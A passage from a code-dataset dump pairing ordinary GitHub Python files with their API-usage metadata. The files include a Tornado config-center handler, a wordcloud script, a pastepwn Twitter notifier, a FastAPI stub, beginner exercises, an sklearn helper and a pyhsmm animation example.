"name"}, {"api_name": 
"PyQt4.QtWebKit.QWebView.__init__", "line_number": 626, "usage_type": "call"}, {"api_name": "PyQt4.QtWebKit.QWebView", "line_number": 626, "usage_type": "attribute"}, {"api_name": "PyQt4.QtWebKit", "line_number": 626, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QUrl", "line_number": 632, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 632, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDoubleSpinBox", "line_number": 641, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 641, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDoubleSpinBox.__init__", "line_number": 647, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QDoubleSpinBox", "line_number": 647, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 647, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QProgressBar", "line_number": 668, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 668, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QProgressBar.__init__", "line_number": 670, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QProgressBar", "line_number": 670, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 670, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 691, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 691, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QVBoxLayout", "line_number": 703, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 703, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QVBoxLayout.__init__", "line_number": 705, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QVBoxLayout", "line_number": 705, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 705, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QHBoxLayout", "line_number": 709, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 709, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QHBoxLayout.__init__", "line_number": 711, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QHBoxLayout", "line_number": 711, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 711, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 715, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 715, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout.__init__", "line_number": 717, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 717, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 717, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 738, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 738, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSpacerItem", "line_number": 743, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 743, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 788, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 788, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame.__init__", "line_number": 790, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 790, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 790, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 791, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 791, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 794, "usage_type": "attribute"}, 
{"api_name": "PyQt4.QtGui", "line_number": 794, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame.__init__", "line_number": 796, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 796, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 796, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 797, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 797, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QObject.connect", "line_number": 835, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QObject", "line_number": 835, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 835, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 835, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 861, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 861, "usage_type": "name"}, {"api_name": "simplejson.dumps", "line_number": 921, "usage_type": "call"}, {"api_name": "simplejson.loads", "line_number": 928, "usage_type": "call"}, {"api_name": "simplejson.loads", "line_number": 941, "usage_type": "call"}, {"api_name": "simplejson.loads", "line_number": 972, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 986, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 986, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 987, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 987, "usage_type": "attribute"}, {"api_name": "simplejson.dumps", "line_number": 991, "usage_type": "call"}, {"api_name": "traceback.format_exception", "line_number": 1082, "usage_type": "call"}, {"api_name": "sys.excepthook", "line_number": 1085, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 1140, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 1140, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread.__init__", "line_number": 1142, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 1142, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 1142, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 1144, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 1144, "usage_type": "name"}, {"api_name": "threading.Event", "line_number": 1147, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 1163, "usage_type": "attribute"}]}
+{"seq_id": "7504729452", "text": "# -*- coding: utf-8 -*-\n# Created by Hans on 16-5-22\n\nfrom tornado.web import RequestHandler\nfrom tornado.options import options\nfrom tornado.web import HTTPError\nfrom config_center.untils import joinPath\nfrom config_dao import ConfigDao\nfrom app_dao import AppDao\nimport untils\n\nconfig_dao = ConfigDao()\napp_dao = AppDao()\n\n\ndef auth(p_type, apps, access_token):\n if type(apps) == list:\n for app in apps:\n permission = p_type + app\n permit = untils.auth(access_token, permission)\n if permit:\n return True\n else:\n permission = p_type + apps\n return untils.auth(access_token, permission)\n\n\nclass CreateHandler(RequestHandler):\n # 写数据库,并更新当前版本为可用版本\n def persistence_conf(self, app_name, config_name, content, version, encrypt=False, username=None):\n config_dao.add_config(app_name, config_name, content, version, encrypt=encrypt, config_owner=username)\n config_dao.un_effective_from(app_name, config_name, version)\n\n def get(self):\n app_name = self.get_argument('data', None)\n self.render('create.html', app_name=app_name)\n\n def post(self):\n username = self.get_cookie('username', None)\n access_token = self.get_cookie('access_token', None)\n appid = self.get_argument('appid')\n if not auth(untils.Permission['WRITE'], [untils.Permission['APP_ALL'], appid], access_token):\n raise HTTPError(403, reason='Permission deny')\n conf_name = self.get_argument('conf_name')\n content = self.get_argument('content')\n encrypt = self.get_argument('encrypt', False) == 'on'\n content = content.replace('\\r\\n', '\\n')\n root = '/' + options.root\n if encrypt:\n # 获取密钥\n secret_key = app_dao.get_app(appid)[0]['secret_key']\n content = untils.encrypt(content, secret_key)\n # 更新zookeeper\n node = joinPath('/', [root, appid, conf_name])\n self.application.zk.ensure_path(node)\n try:\n if self.application.zk.exists(node):\n self.application.zk.set(joinPath('/', [node]), content.encode())\n else:\n self.application.zk.create(joinPath('/', [node]), content.encode())\n except Exception as e:\n raise HTTPError(500, reason=str(e))\n self.persistence_conf(appid, conf_name, content, untils.version(), encrypt, username)\n self.redirect('/')\n\n\nclass IndexHandler(RequestHandler):\n def get(self):\n username = self.get_cookie('username', [])\n app_names = map(lambda x: x['app_name'], app_dao.get_app(owner=username))\n configs = {}\n if len(app_names) == 0:\n self.render('index.html', apps=configs)\n else:\n for app_name in app_names:\n configs[app_name] = []\n data = config_dao.get_config_by_condition(app_name=app_names, effective=1)\n for config in data:\n app_name = config['app_name']\n configs[app_name].append(config)\n self.render('index.html', apps=configs)\n\n\ndef get_uniq_config(app_name, config_name, version):\n data = config_dao.get_config_by_condition(app_name, config_name, version=version)\n conf_content = {\n 'appid': app_name,\n 'conf_name': config_name,\n 'content': data[0]['config_content'],\n 'encrypt': data[0]['encrypt']\n }\n return conf_content\n\n\nclass ShowHandler(RequestHandler):\n def get(self, *args, **kwargs):\n data = self.get_argument('data')\n appid, conf_name, current_version = data.split('(')\n access_token = self.get_cookie('access_token', None)\n if not auth(untils.Permission['READ'], [untils.Permission['APP_ALL'], appid], access_token):\n raise HTTPError(403, reason='Permission deny')\n self.render('show.html', conf_content=get_uniq_config(appid, conf_name, current_version))\n\n\nclass EditHandler(RequestHandler):\n def get(self, 
*args, **kwargs):\n data = self.get_argument('data')\n appid, conf_name, current_version = data.split('(')\n access_token = self.get_cookie('access_token', None)\n if not auth(untils.Permission['UPDATE'], [untils.Permission['APP_ALL'], appid], access_token):\n raise HTTPError(403, reason='Permission deny')\n self.render('edit.html', conf_content=get_uniq_config(appid, conf_name, current_version))\n\n\nclass DeleteHandler(RequestHandler):\n def get(self, *args, **kwargs):\n data = self.get_argument('data')\n appid, conf_name, current_version = data.split('(')\n access_token = self.get_cookie('access_token', None)\n if not auth(untils.Permission['DELETE'], [untils.Permission['APP_ALL'], appid], access_token):\n raise HTTPError(403, reason='Permission deny')\n # delete from zookeeper\n node = joinPath('/', [options.root, appid, conf_name])\n try:\n self.application.zk.delete(node, recursive=True)\n except Exception as e:\n raise HTTPError(500, reason=str(e))\n # delete from mysql\n config_dao.delete_by_config_name(appid, conf_name)\n self.redirect('/')\n", "repo_name": "zhentaowang/config-center", "sub_path": "config_center/handler.py", "file_name": "handler.py", "file_ext": "py", "file_size_in_byte": 5229, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "config_dao.ConfigDao", "line_number": 12, "usage_type": "call"}, {"api_name": "app_dao.AppDao", "line_number": 13, "usage_type": "call"}, {"api_name": "untils.auth", "line_number": 20, "usage_type": "call"}, {"api_name": "untils.auth", "line_number": 25, "usage_type": "call"}, {"api_name": "tornado.web.RequestHandler", "line_number": 28, "usage_type": "name"}, {"api_name": "config_dao.add_config", "line_number": 31, "usage_type": "call"}, {"api_name": "config_dao.un_effective_from", "line_number": 32, "usage_type": "call"}, {"api_name": "untils.Permission", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tornado.web.HTTPError", "line_number": 43, "usage_type": "call"}, {"api_name": "tornado.options.options.root", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 48, "usage_type": "name"}, {"api_name": "app_dao.get_app", "line_number": 51, "usage_type": "call"}, {"api_name": "untils.encrypt", "line_number": 52, "usage_type": "call"}, {"api_name": "config_center.untils.joinPath", "line_number": 54, "usage_type": "call"}, {"api_name": "config_center.untils.joinPath", "line_number": 58, "usage_type": "call"}, {"api_name": "config_center.untils.joinPath", "line_number": 60, "usage_type": "call"}, {"api_name": "tornado.web.HTTPError", "line_number": 62, "usage_type": "call"}, {"api_name": "untils.version", "line_number": 63, "usage_type": "call"}, {"api_name": "tornado.web.RequestHandler", "line_number": 67, "usage_type": "name"}, {"api_name": "app_dao.get_app", "line_number": 70, "usage_type": "call"}, {"api_name": "config_dao.get_config_by_condition", "line_number": 77, "usage_type": "call"}, {"api_name": "config_dao.get_config_by_condition", "line_number": 85, "usage_type": "call"}, {"api_name": "tornado.web.RequestHandler", "line_number": 95, "usage_type": "name"}, {"api_name": "untils.Permission", "line_number": 100, "usage_type": "attribute"}, {"api_name": "tornado.web.HTTPError", "line_number": 101, "usage_type": "call"}, {"api_name": "tornado.web.RequestHandler", "line_number": 105, "usage_type": "name"}, {"api_name": "untils.Permission", "line_number": 110, "usage_type": "attribute"}, 
{"api_name": "tornado.web.HTTPError", "line_number": 111, "usage_type": "call"}, {"api_name": "tornado.web.RequestHandler", "line_number": 115, "usage_type": "name"}, {"api_name": "untils.Permission", "line_number": 120, "usage_type": "attribute"}, {"api_name": "tornado.web.HTTPError", "line_number": 121, "usage_type": "call"}, {"api_name": "config_center.untils.joinPath", "line_number": 123, "usage_type": "call"}, {"api_name": "tornado.options.options.root", "line_number": 123, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 123, "usage_type": "name"}, {"api_name": "tornado.web.HTTPError", "line_number": 127, "usage_type": "call"}, {"api_name": "config_dao.delete_by_config_name", "line_number": 129, "usage_type": "call"}]}
+{"seq_id": "74967807767", "text": "import argparse,json\nfrom wordcloud import WordCloud\n\nargparser = argparse.ArgumentParser(description='Wordcloud Generator')\nargparser.add_argument('file',nargs=1,help='A simple json file of word to word count')\nargparser.add_argument('year',nargs=1,type=int,help='The year to generate')\nargparser.add_argument('type',nargs=1,choices=['single','cumulative'])\nargparser.add_argument('imagefile',nargs=1,help='The output image filename')\nargs = argparser.parse_args()\nf = open(args.file[0],'r')\ndata = json.load(f)\nf.close()\nyear = args.year[0]\n\nwords = []\nif (args.type[0]=='cumulative'):\n wordCount = {}\n for langYear,languageUsed in data.items():\n if (int(langYear)<=year):\n print('processing {}'.format(langYear))\n for word,count in languageUsed.items():\n if (word in wordCount):\n wordCount[word] += count\n else:\n wordCount[word] = count\n for word,count in wordCount.items():\n words.append((word,count))\n \nelse:\n for langYear,languageUsed in data.items():\n if (year == int(langYear)):\n print('processing {}'.format(langYear))\n for word,count in languageUsed.items():\n words.append((word,count))\n\nwc = WordCloud(width=600,height=450,background_color='white').generate_from_frequencies(words)\nwc.to_file(args.imagefile[0])\n", "repo_name": "alexmilowski/goodies", "sub_path": "data-science/cfa/generate-wordcloud.py", "file_name": "generate-wordcloud.py", "file_ext": "py", "file_size_in_byte": 1341, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 4, "usage_type": "call"}, {"api_name": "json.load", "line_number": 11, "usage_type": "call"}, {"api_name": "wordcloud.WordCloud", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "38575195076", "text": "# -*- coding: utf-8 -*-\nimport logging\nfrom string import Template\n\nimport twitter\n\nfrom pastepwn.util import DictWrapper\nfrom .basicaction import BasicAction\n\n\nclass TwitterAction(BasicAction):\n \"\"\"Action to tweet a message to a given account\"\"\"\n\n name = \"TwitterAction\"\n\n def __init__(\n self,\n consumer_key=None,\n consumer_secret=None,\n access_token_key=None,\n access_token_secret=None,\n template=None,\n ):\n super().__init__()\n\n self.logger = logging.getLogger(__name__)\n\n self.twitter_api = twitter.Api(\n consumer_key=consumer_key,\n consumer_secret=consumer_secret,\n access_token_key=access_token_key,\n access_token_secret=access_token_secret,\n )\n\n if template is not None:\n self.template = Template(template)\n else:\n self.template = None\n\n def perform(self, paste, analyzer_name=None):\n \"\"\"Tweet a message\"\"\"\n\n if self.template is None:\n text = \"New paste matched by analyzer '{0}' - Link: {1}\".format(\n analyzer_name, paste.full_url\n )\n else:\n paste_dict = paste.to_dict()\n paste_dict[\"analyzer_name\"] = analyzer_name\n text = self.template.safe_substitute(DictWrapper(paste_dict))\n\n self.twitter_api.PostUpdate(text)\n", "repo_name": "Antarius225/pastepwn", "sub_path": "pastepwn/actions/twitteraction.py", "file_name": "twitteraction.py", "file_ext": "py", "file_size_in_byte": 1385, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "31", "api": [{"api_name": "basicaction.BasicAction", "line_number": 11, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "twitter.Api", "line_number": 28, "usage_type": "call"}, {"api_name": "string.Template", "line_number": 36, "usage_type": "call"}, {"api_name": "pastepwn.util.DictWrapper", "line_number": 50, "usage_type": "call"}]}
+{"seq_id": "43584367814", "text": "import json\r\nimport os\r\n\r\nfrom post_stack import PostStack\r\n\r\nclass Group:\r\n def __init__(self, group_id, vk):\r\n self.group_id = group_id\r\n self.posts_file = f\"data\\posts\\{str(self.group_id)}.json\" \r\n self.viewed_posts_id = PostStack()\r\n self.vk = vk\r\n self.load()\r\n \r\n def add_viewed_post_id(self, *posts_id):\r\n self.viewed_posts_id.add(*posts_id)\r\n self.save()\r\n \r\n def filter_posts(self, posts):\r\n new_posts = list(filter(lambda post: post['id'] not in self.viewed_posts_id.items, posts))\r\n return new_posts\r\n \r\n def save(self):\r\n with open(self.posts_file, 'w') as f:\r\n json.dump(self.viewed_posts_id.get_file_version(), f)\r\n \r\n def load(self):\r\n if not os.path.exists(self.posts_file):\r\n open(self.posts_file, 'a').close()\r\n self.viewed_posts_id = PostStack()\r\n else:\r\n try:\r\n with open(self.posts_file) as f:\r\n data = json.load(f)\r\n\r\n pointer, data = data[0] ,data[1:]\r\n size = len(data)\r\n\r\n self.viewed_posts_id = PostStack(size, pointer)\r\n\r\n self.viewed_posts_id.from_data(data)\r\n except Exception as err:\r\n print('Error', err)\r\n \r\n def get_new_posts(self, n=5):\r\n if self.vk[0] != None:\r\n items = self.vk[0].wall.get(owner_id=self.group_id, count=5)['items']\r\n return self.filter_posts(items)\r\n return []", "repo_name": "ammv/MyBots", "sub_path": "VkMinerBot/group.py", "file_name": "group.py", "file_ext": "py", "file_size_in_byte": 1586, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "post_stack.PostStack", "line_number": 10, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "post_stack.PostStack", "line_number": 29, "usage_type": "call"}, {"api_name": "json.load", "line_number": 33, "usage_type": "call"}, {"api_name": "post_stack.PostStack", "line_number": 38, "usage_type": "call"}]}
+{"seq_id": "31343415317", "text": "from fastapi import FastAPI\n\nfrom users.models import User\nfrom users.views import users_router\nfrom db import init_db\n\napp = FastAPI()\napp.include_router(users_router, prefix='/api', tags=['users'])\n\n\n# CORSHEADERS FOR FRONTEND\norigins = [\n\n]\n\n\n@app.on_event(\"startup\")\nasync def on_startup():\n await init_db()\n\n\n\n@app.get(\"/\")\nasync def main():\n return 123", "repo_name": "AnthonyRedGrave/PetProjectCourseHunter", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 365, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "fastapi.FastAPI", "line_number": 7, "usage_type": "call"}, {"api_name": "users.views.users_router", "line_number": 8, "usage_type": "argument"}, {"api_name": "db.init_db", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "39794975752", "text": "# Bài 1: Find Pair\n\nlistA = [3, 6, 7, 9, 11, 12] \nsum = int(input(\"Nhập vào tổng sum: \"))\nlist_result = []\n\nfor i in range(0,len(listA)-1):\n for j in range (i+1,len(listA)):\n if listA[i] + listA[j] == sum:\n my_set = (listA[i],listA[j])\n list_result.append(my_set)\n \nprint(\"Với tổng bằng {0} thì có số cặp thỏa mãn: {1}\".format(sum,list_result))\n\n#Bài 2: Unique value Dictionary\n\n############ Ví dụ 1 ########\n\nvalue_dict_1 = dict(Trang=38, Thu=38, Ngoc=27, Thanh=26, Yen=25, Hang=22, Thuy=22)\n\nvalue_list = []\n\nfor i in value_dict_1:\n value_list.append(value_dict_1[i])\n\nunique_value_dict = set(list(value_list))\nprint(unique_value_dict)\n\n############ Ví dụ 2 ########\n\nvalue_dict_2 = [{\"V\":\"S001\"}, {\"V\": \"S002\"}, {\"VI\": \"S001\"}, {\"VI\": \"S005\"}, {\"VII\":\"S005\"}, {\"V\":\"S009\"},{\"VIII\":\"S007\"}]\n\nvalue_list_2 = set()\n\nfor i in value_dict_2:\n value_list_2.update(list(i.values()))\n\nprint(value_list_2)\n\n\n#Bài 4: Đếm số\n\nmy_list = [10, 21, 21, 40, 40, 52, 52, 1, 1, 2, 2, 2, 2, 11, 11, 11, 11, 25, 24, 24, 60, 40]\nmy_dict = dict.fromkeys(my_list)\nlist_unique=list(my_dict)\n\nfor i in list_unique:\n my_dict[i] = my_list.count(i)\nprint(my_dict)\n\n\n# Bài 5: Print Star\n\n############ Ví dụ 1 ########\n\nn = int(input(\"Nhap vao so dong: \"))\n\nfor i in range(1,n+1):\n #print(i*'\\t*')\n print((n-i)*\"\\t\", i*'\\t*')\n\n\n############ Ví dụ 2 ########\n\nso_dong = int(input(\"Nhap vao so dong: \"))\n\nfor i in range(1,so_dong+1):\n #print(i*'\\t*')\n n = i*'*'\n if i == so_dong:\n print(i*'\\t*', end = '')\n break\n print((so_dong-i)*\"\\t\", i*'\\t*')\n\nfor i in range(so_dong, 0, -1):\n if(i == so_dong):\n print(i*'\\t*')\n continue\n print( (so_dong)*\"\\t\", i*'\\t*')\n\n\n#Bài 3: Đếm ngược tới Xmas sau thời gian second giây \n\nimport datetime\nimport time\n\nxmas = datetime.datetime(2021, 12, 25)\nsecond = int(input(\"Nhập vào số giây đếm ngược: \"))\n\nwhile True:\n \n today = datetime.datetime.now()\n dem_nguoc = xmas - today\n print(\"Countdown to Xmas 2021: \",dem_nguoc)\n time.sleep(second)", "repo_name": "hangdtt29/Python_Leaning", "sub_path": "Python_Basic/Cautrucdulieu_python_hw3.py", "file_name": "Cautrucdulieu_python_hw3.py", "file_ext": "py", "file_size_in_byte": 2121, "program_lang": "python", "lang": "vi", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "datetime.datetime", "line_number": 87, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 92, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 95, "usage_type": "call"}]}
+{"seq_id": "32137933792", "text": "from sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\n\ndef modeling(dataForModel: tuple, model: str = \"LogisticRegression\") -> tuple:\n \"\"\"Returns trained model and its accuracy score\n params:\n dataForModel: tuple\n Its length is 4, and its elements are X_train, X_valid, y_train, y_valid in order.\n model: str\n The name of machine learning model. In this notebook, LogisticRegression only.\n When unknown name are assigned, return None\n return: tuple<(machine learning model), tuple>\n The first element is trained model.\n The second element is dictionary which accuracy score of 'train' and 'valid' are in it.\n \"\"\"\n X_train, X_valid, y_train, y_valid = dataForModel\n\n if (model == \"LogisticRegression\"):\n model = LogisticRegression()\n else:\n return None\n\n model.fit(X_train, y_train)\n accuracy_train: float = accuracy_score(y_train, model.predict(X_train))\n accuracy_valid: float = accuracy_score(y_valid, model.predict(X_valid))\n\n return model, {\"accuracy_train\": accuracy_train, \"accuracy_valid\": accuracy_valid}\n ", "repo_name": "takahiroaoki/titanic", "sub_path": "modules/modeling.py", "file_name": "modeling.py", "file_ext": "py", "file_size_in_byte": 1191, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 24, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "33677851016", "text": "from __future__ import division\nimport numpy as np\nfrom matplotlib import pyplot as plt\nplt.ion()\nnp.random.seed(0)\n\nimport pyhsmm\nfrom pyhsmm.util.text import progprint_xrange\nfrom pyhsmm.util.stats import whiten, cov\n\nimport autoregressive.models as m\nimport autoregressive.distributions as d\n\n###################\n# generate data #\n###################\n\nAs = [0.99*np.hstack((-np.eye(2),2*np.eye(2))),\n 0.99*np.array([[np.cos(np.pi/6),-np.sin(np.pi/6)],[np.sin(np.pi/6),np.cos(np.pi/6)]]).dot(np.hstack((-np.eye(2),np.eye(2)))) + np.hstack((np.zeros((2,2)),np.eye(2))),\n 0.99*np.array([[np.cos(-np.pi/6),-np.sin(-np.pi/6)],[np.sin(-np.pi/6),np.cos(-np.pi/6)]]).dot(np.hstack((-np.eye(2),np.eye(2)))) + np.hstack((np.zeros((2,2)),np.eye(2)))]\n\ntruemodel = m.ARHSMM(\n alpha=2.,init_state_distn='uniform',\n obs_distns=[d.AutoRegression(A=A,sigma=np.eye(2)) for A in As],\n dur_distns=[pyhsmm.basic.distributions.PoissonDuration(alpha_0=3*50,beta_0=3)\n for state in range(len(As))],\n )\n\ndata, labels = truemodel.generate(1000)\ndata += np.random.normal(size=data.shape) # some extra noise\n\nfig, spa = plt.subplots(2,1)\nspa[0].plot(data[:,0],data[:,1],'bx-')\nspa[1].plot(data,'bx-')\nspa[1].set_xlim(0,data.shape[0])\nfig.suptitle('data')\n\ntruemodel.plot()\nplt.gcf().suptitle('truth')\n\n##################\n# create model #\n##################\n\nNmax = 25\naffine = True\nnlags = 2\nmodel = m.ARWeakLimitStickyHDPHMM(\n alpha=4.,gamma=4.,kappa=100.,\n init_state_distn='uniform',\n obs_distns=[\n d.AutoRegression(\n nu_0=2.5,\n S_0=2.5*np.eye(2),\n M_0=np.zeros((2,2*nlags+affine)),\n K_0=10*np.eye(2*nlags+affine),\n affine=affine)\n for state in range(Nmax)],\n )\n\nmodel.add_data(data)\n\n###############\n# inference #\n###############\n\nfrom moviepy.video.io.bindings import mplfig_to_npimage\nfrom moviepy.editor import VideoClip\n\nfig = model.make_figure()\nplt.set_cmap('terrain')\nplot_slice = slice(0,300)\n\nmodel.plot(fig=fig,draw=False,plot_slice=plot_slice)\n\ndef make_frame_mpl(t):\n model.resample_model()\n model.plot(fig=fig,update=True,draw=False,plot_slice=plot_slice)\n plt.tight_layout()\n return mplfig_to_npimage(fig)\n\nanimation = VideoClip(make_frame_mpl, duration=10)\nanimation.write_videofile('gibbs.mp4',fps=30)\n\n", "repo_name": "mattjj/pyhsmm-autoregressive", "sub_path": "examples/animation.py", "file_name": "animation.py", "file_ext": "py", "file_size_in_byte": 2387, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.pyplot.ion", "line_number": 4, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 4, "usage_type": "name"}, {"api_name": "numpy.random.seed", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 5, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", 
"line_number": 20, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 20, "usage_type": "call"}, {"api_name": "autoregressive.models.ARHSMM", "line_number": 22, "usage_type": "call"}, {"api_name": "autoregressive.models", "line_number": 22, "usage_type": "name"}, {"api_name": "autoregressive.distributions.AutoRegression", "line_number": 24, "usage_type": "call"}, {"api_name": "autoregressive.distributions", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.eye", "line_number": 24, "usage_type": "call"}, {"api_name": "pyhsmm.basic.distributions.PoissonDuration", "line_number": 25, "usage_type": "call"}, {"api_name": "pyhsmm.basic", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "autoregressive.models.ARWeakLimitStickyHDPHMM", "line_number": 48, "usage_type": "call"}, {"api_name": "autoregressive.models", "line_number": 48, "usage_type": "name"}, {"api_name": "autoregressive.distributions.AutoRegression", "line_number": 52, "usage_type": "call"}, {"api_name": "autoregressive.distributions", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.eye", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.set_cmap", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 